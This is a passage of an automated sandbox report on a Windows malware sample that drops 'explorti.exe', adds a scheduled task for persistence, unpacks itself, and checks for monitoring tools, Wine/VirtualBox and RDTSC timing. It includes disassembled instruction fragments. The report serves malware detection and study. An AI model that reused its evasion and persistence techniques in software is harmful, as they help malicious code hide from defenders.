Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: 11NdzR12PS.exe

Static file information: File size 1921536 > 1048576

Source: 11NdzR12PS.exe

Static PE information: Raw size of wokugkrf is bigger than: 0x100000 < 0x1a3800

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Unpacked PE file: 0.2.11NdzR12PS.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 1.2.explorti.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 5.2.explorti.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1db077 should be: 0x1e273f
Source: 11NdzR12PS.exe	Static PE information: real checksum: 0x1db077 should be: 0x1e273f

Source: 11NdzR12PS.exe	Static PE information: section name:
Source: 11NdzR12PS.exe	Static PE information: section name: .idata
Source: 11NdzR12PS.exe	Static PE information: section name:
Source: 11NdzR12PS.exe	Static PE information: section name: wokugkrf
Source: 11NdzR12PS.exe	Static PE information: section name: csqdmnjl
Source: 11NdzR12PS.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: wokugkrf
Source: explorti.exe.0.dr	Static PE information: section name: csqdmnjl
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 5_2_006AD84C push ecx; ret

5_2_006AD85F

Source: 11NdzR12PS.exe	Static PE information: section name: entropy: 7.980756696745502
Source: 11NdzR12PS.exe	Static PE information: section name: wokugkrf entropy: 7.954605137442367
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.980756696745502
Source: explorti.exe.0.dr	Static PE information: section name: wokugkrf entropy: 7.954605137442367

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\11NdzR12PS.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: D9F1B3 second address: D9F1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: D9F1B8 second address: D9F1BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: D9F1BD second address: D9F1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21A70 second address: F21A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21A76 second address: F21A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21A7B second address: F21ABA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007FF3408102FBh 0x0000000c popad 0x0000000d jmp 00007FF340810303h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ecx 0x00000015 jmp 00007FF3408102FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FF3408102F6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21ABA second address: F21ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21ABE second address: F21AC8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF3408102F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F04D6D second address: F04D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2099B second address: F209A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F209A1 second address: F209F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jng 00007FF34080AB2Dh 0x0000000b jmp 00007FF34080AB18h 0x00000010 jmp 00007FF34080AB0Fh 0x00000015 pushad 0x00000016 jmp 00007FF34080AB19h 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F20CCC second address: F20CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810300h 0x00000007 jo 00007FF3408102FCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21047 second address: F2107B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Fh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FF34080AB10h 0x00000010 jmp 00007FF34080AB0Eh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2107B second address: F210AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF3408102FEh 0x00000008 jno 00007FF340810302h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007FF3408102F6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F210AC second address: F210BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FF34080AB0Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F210BF second address: F210C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F210C5 second address: F210C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24838 second address: F2483E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2483E second address: F24846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2487A second address: F24884 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3408102FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24884 second address: F2491C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FF34080AB12h 0x0000000e jg 00007FF34080AB0Ch 0x00000014 mov dword ptr [ebp+122D1A07h], esi 0x0000001a push 00000000h 0x0000001c jmp 00007FF34080AB15h 0x00000021 call 00007FF34080AB09h 0x00000026 pushad 0x00000027 pushad 0x00000028 jno 00007FF34080AB06h 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 jmp 00007FF34080AB17h 0x00000036 popad 0x00000037 push eax 0x00000038 jnl 00007FF34080AB23h 0x0000003e pushad 0x0000003f jg 00007FF34080AB06h 0x00000045 jmp 00007FF34080AB15h 0x0000004a popad 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push eax 0x00000050 push edx 0x00000051 push esi 0x00000052 pushad 0x00000053 popad 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2491C second address: F2496A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FF3408102FEh 0x00000014 popad 0x00000015 jmp 00007FF3408102FCh 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FF3408102FAh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2496A second address: F249D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edi, ebx 0x0000000c push 00000003h 0x0000000e add dl, 00000000h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FF34080AB08h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub ecx, dword ptr [ebp+122D2A56h] 0x00000033 push 00000003h 0x00000035 add dword ptr [ebp+122D2649h], edi 0x0000003b call 00007FF34080AB09h 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF34080AB16h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F249D5 second address: F249F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FF3408102FFh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F249F0 second address: F24A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jng 00007FF34080AB10h 0x00000010 pushad 0x00000011 jnp 00007FF34080AB06h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jmp 00007FF34080AB0Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 ja 00007FF34080AB06h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A23 second address: F24A42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF340810302h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A42 second address: F24A6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [ebp+122DB87Dh], edi 0x00000010 lea ebx, dword ptr [ebp+124597A9h] 0x00000016 mov ecx, dword ptr [ebp+122D2B4Eh] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A6C second address: F24A72 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A72 second address: F24A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A78 second address: F24A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24ABF second address: F24AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24AD7 second address: F24B58 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3408102F8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1B60h], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FF3408102F8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f or dword ptr [ebp+122DB821h], edi 0x00000035 cld 0x00000036 call 00007FF3408102F9h 0x0000003b push ebx 0x0000003c jo 00007FF3408102F8h 0x00000042 pushad 0x00000043 popad 0x00000044 pop ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 jne 00007FF3408102FCh 0x0000004d pop edx 0x0000004e mov eax, dword ptr [esp+04h] 0x00000052 push edi 0x00000053 jmp 00007FF340810309h 0x00000058 pop edi 0x00000059 mov eax, dword ptr [eax] 0x0000005b pushad 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24D77 second address: F24D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF34080AB16h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F46169 second address: F4616D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4616D second address: F46171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F46171 second address: F4617F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF340810302h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4617F second address: F461AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF34080AB06h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007FF34080AB0Ah 0x00000012 jmp 00007FF34080AB0Fh 0x00000017 jc 00007FF34080AB0Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F44735 second address: F44739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F44739 second address: F4473F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449AE second address: F449B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449B4 second address: F449C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF34080AB06h 0x0000000e jnp 00007FF34080AB06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449C8 second address: F449E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jo 00007FF3408102F8h 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449E5 second address: F449FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB10h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449FE second address: F44A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F450B8 second address: F450C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F450C1 second address: F450C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F450C5 second address: F450CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4520C second address: F45213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45213 second address: F45227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB0Dh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45374 second address: F45378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45378 second address: F45395 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF34080AB13h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45395 second address: F4539B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4539B second address: F453B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB12h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45BCC second address: F45BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810307h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45BEB second address: F45BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF34080AB06h 0x0000000a popad 0x0000000b rdtsc
